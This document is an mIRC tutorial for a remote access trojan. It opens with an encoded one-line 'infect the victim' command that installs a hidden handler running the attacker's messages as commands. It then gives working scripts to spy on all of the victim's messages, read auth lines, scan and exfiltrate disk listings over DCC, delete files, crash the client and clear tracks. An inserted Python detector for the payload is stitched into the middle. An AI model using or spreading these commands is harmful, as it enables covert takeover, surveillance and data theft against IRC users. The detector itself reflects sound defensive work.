Tutorial mIRC
Remote Access Script
Install on remote computer (Infect the victim)
The script is activated when the user of the remote PC types the following command:
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK i love you
YOURNICK = your nick. The remote computer will message you “I love you” once he types the command. You can edit that message or just delete the “ | msg YOURNICK i love you ” part.
This is what the command does: it creates a new .mrc file named czm and writes the following line into it (this line is what is encoded in the command):
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
The haltdef blocks the display of your messages to the remote PC that begin with “ins”. Because of this the user can’t see your commands, so he won't have a clue who is controlling his mIRC. You can leave that part out of the command when you want the messages to be visible on the remote computer. Most of the time, however, you don't want the remote computer to "read" all the messages, since they are irrelevant (in the bot case, for example).
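For reviewing a pasted command or a .mrc file before it is run, the following added example (not part of the original tutorial) decodes `$decode(...,m)` arguments and flags the handler pattern described above: a TEXT event that runs the received words as a command and hides the trigger with haltdef. The function names, the finding labels and the benign sample line are assumptions made for illustration.

```python
import base64
import re

# $decode(<base64>,m): the ",m" switch selects base64 in mIRC scripting.
DECODE_RE = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)", re.I)
# TEXT event handler: on <level>:text:<match>:<target>:<body>
TEXT_EVENT_RE = re.compile(r"\bon\s+(\S*?):text:([^:]*):([^:]*):(.*)", re.I)
# Handler body that runs the received words as a command, e.g. "{ . $+ $2-"
EXEC_ARGS_RE = re.compile(r"\{\s*\.?\s*\$\+\s*\$\d+-")
# /load -rs or .load -rs, but not /unload -rs
LOAD_RE = re.compile(r"(?<![a-z])\.?load\s+-rs\b", re.I)

# The command quoted in the tutorial, joined onto one line.
PAGE_COMMAND = ("//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8"
                "IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK i love you")
# Constructed benign handler for comparison (not from the page).
BENIGN_LINE = "on *:TEXT:!hello*:#:{ msg $chan Hello $nick }"


def expand_decodes(line):
    """Replace each $decode(...,m) with its decoded text so it can be inspected."""
    def _sub(m):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not base64, keep as is
            return m.group(0)
        return raw.decode("utf-8", "replace")
    return DECODE_RE.sub(_sub, line)


def analyze(line):
    """Return sorted finding labels for one pasted command or .mrc line."""
    findings = set()
    if DECODE_RE.search(line):
        findings.add("encoded-payload")
    if LOAD_RE.search(line):
        findings.add("loads-remote-script")
    event = TEXT_EVENT_RE.search(expand_decodes(line))
    if event:
        level, _match, _target, body = event.groups()
        if EXEC_ARGS_RE.search(body):
            findings.add("executes-incoming-text")
        if level.startswith("^") and re.search(r"\bhaltdef\b", body, re.I):
            findings.add("hides-trigger-message")
    return sorted(findings)


if __name__ == "__main__":
    for sample in (PAGE_COMMAND, BENIGN_LINE):
        print(analyze(sample), "<-", expand_decodes(sample))
```
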
Example:
/msg bot ins msg #channel hi
This will let the bot send the “hi” message to #channel, but the remote PC will NOT see it; everyone else in the channel will. And the bot will not see your message “ins msg #channel hi” because it is blocked by “haltdef”. Nice, isn’t it? In a bot application this means the bot doesn't get all the garbage data that it doesn't need.
Once the bot has executed that command, the remote script is active. You can add a spy function if you want (this can cause him an excess flood if he is on too many “popular” channels, i.e. channels with a lot of activity or chatting). To add the spy part (it will send you all his activity: messages received, messages sent and commands executed), execute the following commands:
Spy the remote PC (e.g. logging the activities for bots)
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
Once that is done, you’ll receive the messages immediately. You can stop the spy function by typing the following command:
/msg bot ins unload -rs myscript.mrc
Note: bot = the nick of the client that has executed that command and therefore has the remote script (the RAT, aka Trojan) activated.
Sometimes you want to spy on the remote PC only partly, for example to read only the private messages and not the messages from the channels he is in. This gives him less chance of flooding himself off the server (excess flood). The spy script then becomes:
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
YOURNICK is your nick, and bot is the nick of the remote client.
Make other remote files (.mrc)
You can make remote files yourself and add useful functions to them.
/msg bot insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg bot ins .load -rs YOURSCRIPTNAME.mrc
Use of the Trojan
REMOVE FILE:
/msg bot ins remove C:\Textfile.txt
OPEN SITE:
/msg bot ins url www.site.com
JOIN CHANNEL:
/msg bot ins join #channel
PART CHANNEL:
/msg bot ins part #channel
QUERY USER:
/msg bot ins query user
MSG USER:
/msg bot ins msg user
INVITE USER:
/msg bot ins invite user #channel
BAN USER:
/msg bot ins ban #channel user
KICK USER:
/msg bot ins kick #channel user
IGNORE USER:
/msg bot ins ignore *!*@host.com
UNIGNORE USER:
/msg bot ins unignore *!*@host.com
CHANGE NICK:
/msg bot ins nick thenickyouwant
OP USER:
/msg bot ins mode #channel +o user
VOICE USER:
/msg bot ins mode #channel +v user
CHANGE TOPIC:
/msg bot ins topic #channel text
RECEIVE FILE:
/msg bot ins dcc send user file
or
/msg bot ins dcc send user C:\something.sth
EDIT TEXT:
/msg bot ins write -l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
The following commands must be executed one after another:
/msg bot ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg bot ins .load -rs mab
/msg bot ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg bot ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg bot ins .load -rs MAB1
/msg bot ins MAB1
LET HIS mIRC CRASH:
/msg bot ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg bot ins .load -rs MAB2
/msg bot ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
Note: You probably want this file; to get it, do this:
/msg bot ins dcc send YOURNICK C:\M_A_B.txt
** Important note **
The bot will see the send dialog, so act quickly. For security reasons I suggest writing another trojan to another file, like:
/msg bot write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF):
/msg bot ins ajinvite on
LET THE BOT MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg bot ins amsg <the message you want him to say on all channels>
CHANGE THE BOT'S ALTERNATIVE NICK:
/msg bot ins anick <nickname>
CHANGE THE BOT'S BACKGROUND PICTURE:
/msg bot ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
/msg bot ins channel #CHANNELNAME
Note: the bot must be on #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg bot ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE BOT CLIPBOARD A SPECIFIED TEXT:
/msg bot ins clipboard <the text you want to be clipboarded>
CLOSE THE OPEN QUERIES OF THE BOT:
/msg bot ins close
LET THE BOT QUIT mIRC:
/msg bot ins quit <the quit message you want>
LET THE BOT DISCONNECT FROM SERVER:
/msg bot ins disconnect
LET THE BOT CHANGE SERVER:
/msg bot ins server the.server.you.want
LET THE BOT OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg bot ins server -m
/msg bot ins server the.server.you.want
LET THE BOT GIVE YOU FLAGS (if he is able to):
/msg bot ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
chanlev = can be different; sometimes it is "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE BOT'S FONT AND FONT SIZE:
/msg bot ins font -asgbd <fontsize> <fontname>
CHANGE THE BOT'S FULL NAME:
/msg bot ins fullname <name>
LET THE BOT REJOIN A CHANNEL:
/msg bot ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE BOT'S HARD DISK:
/msg bot ins mkdir <dirname>
NOTE:
bot = nick of the remote client
user = your nick
Still questions?
Ask on IRC!